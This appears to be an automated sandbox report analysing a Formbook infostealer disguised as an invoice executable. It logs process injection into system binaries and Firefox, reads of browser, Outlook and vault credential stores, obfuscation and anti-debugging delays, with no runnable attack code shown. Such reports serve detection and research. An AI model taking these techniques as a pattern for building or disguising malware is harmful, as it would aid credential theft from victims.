            Source: 00000002.00000002.1898787100.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: HYCO_Invoices MS2 & MS3.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, xUidB8gG139RXqKEpj.cs, Security API names: _0020.SetAccessControl
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, xUidB8gG139RXqKEpj.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, xUidB8gG139RXqKEpj.cs, Security API names: _0020.AddAccessRule
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, SSYGWfDca6ipkM6C75.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, SSYGWfDca6ipkM6C75.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, xUidB8gG139RXqKEpj.cs, Security API names: _0020.SetAccessControl
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, xUidB8gG139RXqKEpj.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, xUidB8gG139RXqKEpj.cs, Security API names: _0020.AddAccessRule
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, xUidB8gG139RXqKEpj.cs, Security API names: _0020.SetAccessControl
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, xUidB8gG139RXqKEpj.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, xUidB8gG139RXqKEpj.cs, Security API names: _0020.AddAccessRule
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, SSYGWfDca6ipkM6C75.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@9/2@7/6
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HYCO_Invoices MS2 & MS3.exe.log
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Mutant created: NULL
            Source: C:\Windows\SysWOW64\replace.exe, File created: C:\Users\user\AppData\Local\Temp\C3vB7APK
            Source: HYCO_Invoices MS2 & MS3.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Program Files\Mozilla Firefox\firefox.exe, File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: replace.exe, 00000005.00000003.2088920007.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2889773857.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: HYCO_Invoices MS2 & MS3.exe, ReversingLabs: Detection: 47%
            Source: HYCO_Invoices MS2 & MS3.exe, Virustotal: Detection: 40%
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, File read: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe:Zone.Identifier
            Source: unknown, Process created: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe"
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Process created: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe"
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Process created: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe"
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe, Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
            Source: C:\Windows\SysWOW64\replace.exe, Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: version.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: ulib.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: version.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\replace.exe, Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe, Section loaded: wininet.dll
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe, Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe, Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe, Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe, Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe, Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\replace.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: HYCO_Invoices MS2 & MS3.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: HYCO_Invoices MS2 & MS3.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: replace.pdb source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897552189.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2889962629.0000000001338000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000003.2173314297.000000000134B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: replace.pdbGCTL source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897552189.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2889962629.0000000001338000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000003.2173314297.000000000134B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000000.1820275052.000000000012E000.00000002.00000001.01000000.0000000A.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000000.1974653157.000000000012E000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1900193345.0000000003494000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1897713849.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: HYCO_Invoices MS2 & MS3.exe, HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000005.00000003.1900193345.0000000003494000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1897713849.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp

            Data Obfuscation

            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, xUidB8gG139RXqKEpj.cs, .Net Code: InpNnDxIhT System.Reflection.Assembly.Load(byte[])
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.335a064.3.raw.unpack, LoginForm.cs, .Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.3319bb4.8.raw.unpack, LoginForm.cs, .Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, xUidB8gG139RXqKEpj.cs, .Net Code: InpNnDxIhT System.Reflection.Assembly.Load(byte[])
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.5b10000.12.raw.unpack, LoginForm.cs, .Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, xUidB8gG139RXqKEpj.cs, .Net Code: InpNnDxIhT System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Code function: 2_2_00416023 push ds; ret 2_2_00416071
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Code function: 2_2_00404834 push ebx; ret 2_2_00404835
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Code function: 2_2_0040A036 push es; ret 2_2_0040A039
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Code function: 2_2_004119A0 pushfd ; iretd 2_2_004119B2
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Code function: 2_2_00409A42 push ecx; ret 2_2_00409A46
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Code function: 2_2_0040D276 push ebx; retf 2_2_0040D29A
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Code function: 2_2_0040D214 push ecx; iretd 2_2_0040D215
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Code function: 2_2_00418B17 push ss; retf 2_2_00418B1B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Code function: 2_2_004074E7 pushad ; iretd 2_2_004074F3
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Code function: 2_2_00403490 push eax; ret 2_2_00403492
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Code function: 2_2_00409D5A push cs; retf 2_2_00409D5B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Code function: 2_2_00406524 push es; iretd 2_2_00406530
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Code function: 2_2_004145D8 pushfd ; ret 2_2_004145D9
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Code function: 2_2_0040CE54 push cs; iretd 2_2_0040CE5B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe, Code function: 2_2_00FF09AD push ecx; mov dword ptr [esp], ecx 2_2_00FF09B6
            Source: C:\Windows\SysWOW64\replace.exe, Code function: 5_2_036709AD push ecx; mov dword ptr [esp], ecx 5_2_036709B6
            Source: C:\Windows\SysWOW64\replace.exe, Code function: 5_2_00E03091 push es; iretd 5_2_00E0309D
            Source: C:\Windows\SysWOW64\replace.exe, Code function: 5_2_00E04054 pushad ; iretd 5_2_00E04060
            Source: C:\Windows\SysWOW64\replace.exe, Code function: 5_2_00E1B010 push edx; ret 5_2_00E1B011
            Source: C:\Windows\SysWOW64\replace.exe, Code function: 5_2_00E013A1 push ebx; ret 5_2_00E013A2
            Source: C:\Windows\SysWOW64\replace.exe, Code function: 5_2_00E1231D push edi; retf 5_2_00E12328
            Source: C:\Windows\SysWOW64\replace.exe, Code function: 5_2_00E065AF push ecx; ret 5_2_00E065B3
            Source: C:\Windows\SysWOW64\replace.exe, Code function: 5_2_00E0E50D pushfd ; iretd 5_2_00E0E51F
            Source: C:\Windows\SysWOW64\replace.exe, Code function: 5_2_00E15684 push ss; retf 5_2_00E15688
            Source: C:\Windows\SysWOW64\replace.exe, Code function: 5_2_00E1B62C pushad ; retf 5_2_00E1B62F
            Source: C:\Windows\SysWOW64\replace.exe, Code function: 5_2_00E068C7 push cs; retf 5_2_00E068C8
            Source: C:\Windows\SysWOW64\replace.exe, Code function: 5_2_00E1FAD6 push es; iretd 5_2_00E1FADE
            Source: C:\Windows\SysWOW64\replace.exe, Code function: 5_2_00E1ABE0 push ebx; ret 5_2_00E1ABE1
            Source: C:\Windows\SysWOW64\replace.exe, Code function: 5_2_00E06BA3 push es; ret 5_2_00E06BA6
            Source: C:\Windows\SysWOW64\replace.exe, Code function: 5_2_00E1FBB8 push edx; iretd 5_2_00E1FBD8
            Source: C:\Windows\SysWOW64\replace.exe, Code function: 5_2_00E12B90 push ds; ret 5_2_00E12BDE
            Source: HYCO_Invoices MS2 & MS3.exe, Static PE information: section name: .text entropy: 7.956113865860276
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, multiple .cs classes: High entropy of concatenated method names
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, multiple .cs classes: High entropy of concatenated method names
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, multiple .cs classes: High entropy of concatenated method names
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, xQiJO5us6DiOO5sIgg.csHigh entropy of concatenated method names: 'CBWPICLH6I', 'hohPd6mLrs', 'Ve7PUqRpmp', 'GFxP9rjxHv', 'C39PurJKRB', 'XOmPS9iP7V', 'EoQPtO7KEM', 'flUP29XcoD', 'z8dPVUUxmo', 'wCmPwadd2p'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, xUidB8gG139RXqKEpj.csHigh entropy of concatenated method names: 'nP91FMULCd', 'hXe1ganbll', 'joB1iFyQ48', 'qW81BSvmHm', 'v3M1lbNbJV', 'EYl1ajYbtT', 'AZV1QLxyAR', 'u451y4atsp', 'L5c1bqk7UF', 'qCj1Z2cm0T'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, lHvGJbLRUxqHjuNVyP.csHigh entropy of concatenated method names: 'KPvGcOwocc', 'UkhG1FosAE', 'sC4GNaSsor', 'N07GggkS7r', 'mTCGiMcSUv', 'fB1GlyHZZr', 'JlwGaMYLu9', 'C2qkmflqwK', 'CWLkWysaco', 'u06kKfIgye'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, f7t0WrYoXNeVinHJdg.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'JOMvKNp2sc', 'cavvfeoqTk', 'EWdvzNoVFn', 'EAL1jCRB81', 'TXi1cyFSq9', 'VMx1vJnGv4', 'PHM11ZFWMG', 'OdgxRTooZlirAR9l28R'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, sir47mZZTPCbePi31b.csHigh entropy of concatenated method names: 'dJhnifyZu', 'oQAAKCtMs', 'sjGo4kmxs', 'oxB0VtDBg', 'PiwdG5YS0', 'vrWhpIbPL', 'ImWamjyMYSvQMXsNA0', 'VR3LZoql8cuP3jE7gd', 'TQ4kaTPp2', 'OCSOpquOR'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, VBBrj4q7OxhL1AOEAN.csHigh entropy of concatenated method names: 'VxNkUOmPIk', 'YFlk9TU5pc', 'wh8kXOLpp0', 'tb5kuo5n2E', 'yFnkpSFTKf', 'ANjkSZAygL', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, uRaCHDMK1mN0X9ZlUAA.csHigh entropy of concatenated method names: 'HHjGJUJKJ1', 'pRiGCSHa9L', 'JccGnv8yqc', 'ylRGAnpVKI', 'QrfGsdColU', 'K6tGoKlycv', 'm85G0fxx2b', 'HhWGIrQeol', 'GPPGdHQ94d', 'FBrGhK2osf'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, yVybD364GKpxs3MmaR.csHigh entropy of concatenated method names: 'xDoBAULC4f', 'B9wBoPEJsg', 'qEpBIns40A', 'uG2BdgAnAs', 'vDbBDMUc7o', 'y2BB6kW6lD', 'kLtB53BhgQ', 'BDiBkSpYsl', 'hnRBGPJqWB', 'NkQBOLiHwi'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, VUpQ3JzfQcgbpyyG6Y.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ycEGPbXX7P', 'GI5GDs0ErO', 'LtLG6mDRMW', 'T5KG54tnex', 'dgXGkI11Vi', 'QSEGGCtg3X', 'ljAGOeo4ed'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, NVc1yVXpcuL61Ykq2a.csHigh entropy of concatenated method names: 'TWZQg4eptG', 'RfDQBiIkAM', 'DNUQaTCOrP', 'UwwafuExVM', 'pcRazrlyF9', 'ycpQjxsw51', 'BboQcuabnt', 'KADQvG1uqq', 'jJyQ13sXME', 'rCmQNZDGdb'
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\replace.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: HYCO_Invoices MS2 & MS3.exe PID: 1020, type: MEMORYSTR
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Memory allocated: 1900000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Memory allocated: 32F0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Memory allocated: 52F0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Memory allocated: 66E0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Memory allocated: 76E0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Memory allocated: 7920000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Memory allocated: 8920000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0103096E rdtsc 2_2_0103096E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\replace.exe Window / User API: threadDelayed 9782
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe API coverage: 0.8 %
            Source: C:\Windows\SysWOW64\replace.exe API coverage: 3.0 %
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe TID: 6096 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\replace.exe TID: 6524 Thread sleep count: 191 > 30
            Source: C:\Windows\SysWOW64\replace.exe TID: 6524 Thread sleep time: -382000s >= -30000s
            Source: C:\Windows\SysWOW64\replace.exe TID: 6524 Thread sleep count: 9782 > 30
            Source: C:\Windows\SysWOW64\replace.exe TID: 6524 Thread sleep time: -19564000s >= -30000s
            Source: C:\Windows\SysWOW64\replace.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E1BC00 FindFirstFileW,FindNextFileW,FindClose,5_2_00E1BC00
            Source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890083176.000000000055F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
            Source: replace.exe, 00000005.00000002.2889773857.0000000003080000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2210324690.000001DAA7C3B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\replace.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00417673 LdrLoadDll,2_2_00417673
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FEC0F0 mov eax, dword ptr fs:[00000030h] 2_2_00FEC0F0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FE8397 mov eax, dword ptr fs:[00000030h]2_2_00FE8397
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FE8397 mov eax, dword ptr fs:[00000030h]2_2_00FE8397
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FE8397 mov eax, dword ptr fs:[00000030h]2_2_00FE8397
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEE388 mov eax, dword ptr fs:[00000030h]2_2_00FEE388
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEE388 mov eax, dword ptr fs:[00000030h]2_2_00FEE388
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEE388 mov eax, dword ptr fs:[00000030h]2_2_00FEE388
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
